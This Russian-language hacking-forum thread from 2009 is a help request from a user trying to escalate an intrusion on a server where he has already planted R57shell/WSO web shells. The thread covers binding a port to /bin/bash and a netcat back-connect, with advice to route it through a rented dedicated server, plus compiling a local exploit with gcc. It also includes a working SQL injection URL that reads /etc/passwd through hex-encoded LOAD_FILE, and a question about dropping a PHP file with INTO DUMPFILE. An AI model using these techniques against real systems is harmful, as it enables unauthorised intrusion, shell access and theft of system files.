Сообщение от nemaniak
Для начала надо забиндить порт, в wso это если не ошибаюсь в разделе network. А затем приконектишься с помощью netcat и откомпилишь командой gcc предварительно сохраненный на серваке сплойт. Например так, gcc sploit.c. Далее запускаешь сплойт ./sploit.c.
Помогите плиз. я так понял что надо открыть на серваке порт для начала. Я юзаю R57SHELL. Я выбрал
Цитата:
Открытие порта и привязка его к /bin/bash
выставил порт 333
Использовать "C"
далее конктюсь так
C:\Documents and Settings\Серёжа>telnet sitewithshell 333
Подключение к sitewithshell...Не удалось открыть подключение к этому узлу, на
порт 333: Сбой подключения
nub-hacker ну ты реально нуб...у себя запускай неткат к тебе сервак конектится а не ты к нему..на то и бакконнект
Дело в том, что я нему быть в роли сервака т.к. я сижу за NATom и проброс портов не могу сделать т.к. NAT осуществляется у прова а не у меня на модеме ((((((((((((
помогите плиз.
//Orb помоги плиз. я тогда буду юзать wso2
/// Какиенить статьи по этому поводу есть на Ачате?
Последний раз редактировалось nub-hacker; 03.07.2009 в 23:31..
nub-hacker, привет Серёжа =)
делай конект через дедик
jokester: Я узнал его первее, даже без модцп и подсказок. Называй его скорпиончик Spyder: Как мило) Grey: давайте ему минусов за@#$чим для разнообразия?
Просстите ещё вопрос.
http://site.name/index.php?шв=777+union+select+concat_ws(0x3a,LOA D_FILE(0x2f6574632f706173737764)),2,3,4,5+limit+1, 1/*
Вот инъекция под рутом. По всей видимости использыется ковычек вырбленно т.к с /etc/passwd не вышло и пишлось hexить.
Надо создать файл в /tmp/phpinfo.php
и вбить код <?phpinfo();?>
=========
https://forum.antichat.ru/threadnav34338-1-10.html
читал эту статью,так что не думай Joker что я не чего не читаю.
но там заливаеться шелл при помощи слэшов.
Цитата:
into+dumpfile+'/tmp/aaaaaaaaa11231.php'/*
У меня по всей видимости такое не прокатит? или я ошибаюсь??